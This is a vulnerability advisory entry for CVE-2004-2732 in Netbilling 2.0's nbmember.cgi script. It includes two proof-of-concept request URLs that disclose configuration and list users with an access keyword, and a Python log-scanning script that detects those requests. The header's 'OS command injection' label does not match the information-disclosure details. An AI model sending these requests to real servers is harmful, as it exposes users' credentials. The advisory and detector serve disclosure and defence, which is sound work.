Netbilling NBMEMBER Script Information Disclosure Vulnerability

Vulnerability ID: 1108238 Vulnerability type: OS command injection
Published: 2004-10-22 Updated: 2007-10-10
CVE ID: CVE-2004-2732 CNNVD-ID: CNNVD-200412-686
Platform: CGI CVSS score: 4.3
|Vulnerability source
https://www.exploit-db.com/exploits/24700
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-686
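|Vulnerability details
nbmember.cgi in Netbilling 2.0 contains a vulnerability. A remote attacker can obtain sensitive information via the cmd=test option, and this can be used to determine the access key.
|Vulnerability exploit (EXP)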
source: http://www.securityfocus.com/bid/11504/info

Netbilling 'nbmember.cgi' script is reported prone to an information disclosure vulnerability. This issue may allow remote attackers to gain access to user authentication credentials and potentially sensitive configuration information.

http://www.example.com/cgi-bin/nbmember.cgi?cmd=test
http://www.example.com/cgi-bin/nbmember.cgi?cmd=list_all_users&keyword=hereistheaccesskeyword
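
A log check for the two request patterns shown above, as an added example that is not part of the original advisory or of Netbilling. It assumes the web server writes common/combined access logs; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Common/combined log format: client IP ... "METHOD target PROTOCOL" status
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')
WATCHED_CMDS = {"test", "list_all_users"}  # the two cmd values shown on this page

def flag_nbmember_requests(lines):
    """Return one finding per request to nbmember.cgi that uses a watched cmd value."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not unquote(url.path).lower().endswith("/nbmember.cgi"):
            continue
        params = parse_qs(url.query, keep_blank_values=True)
        hit = {c.lower() for c in params.get("cmd", [])} & WATCHED_CMDS
        if hit:
            findings.append({
                "ip": m.group("ip"),
                "cmd": sorted(hit)[0],
                "status": int(m.group("status")),
                # The access keyword travels in the query string, so it is also
                # written to access logs and should be treated as exposed.
                "keyword_in_url": "keyword" in params,
            })
    return findings

def keyword_use_after_test(findings):
    """Client IPs that got a 200 for cmd=test and later sent a keyword-bearing request."""
    probed, suspects = set(), []
    for f in findings:
        if f["cmd"] == "test" and f["status"] == 200:
            probed.add(f["ip"])
        elif f["keyword_in_url"] and f["ip"] in probed and f["ip"] not in suspects:
            suspects.append(f["ip"])
    return suspects

# Constructed sample log lines (documentation IP ranges, placeholder keyword)
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Oct/2004:10:01:02 +0000] "GET /cgi-bin/nbmember.cgi?cmd=test HTTP/1.0" 200 512',
    '198.51.100.20 - - [22/Oct/2004:10:01:09 +0000] "GET /index.html HTTP/1.0" 200 2048',
    '203.0.113.7 - - [22/Oct/2004:10:02:30 +0000] "GET /cgi-bin/nbmember.cgi?cmd=list_all_users&keyword=EXAMPLEKEY HTTP/1.0" 200 4096',
    '192.0.2.44 - - [22/Oct/2004:10:05:00 +0000] "GET /cgi-bin/nbmember.cgi?cmd=test HTTP/1.0" 404 128',
]

if __name__ == "__main__":
    print(keyword_use_after_test(flag_nbmember_requests(SAMPLE_LOG)))
```

Any client returned by `keyword_use_after_test` is a reason to rotate the access keyword and restrict access to the script.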
|References

Source: XF
Name: netbilling-information-disclosure(17865)
Link: http://xforce.iss.net/xforce/xfdb/17865
Source: BID
Name: 11504
Link: http://www.securityfocus.com/bid/11504
Source: OSVDB
Name: 10902
Link: http://www.osvdb.org/10902
Source: web.archive.org
Link: http://web.archive.org/web/20041106200147/http://www.it-helpnet.de/bugless/bugs.php?mode=show&id=8&SID=
Source: SECTRACK
Name: 1011881
Link: http://securitytracker.com/id?1011881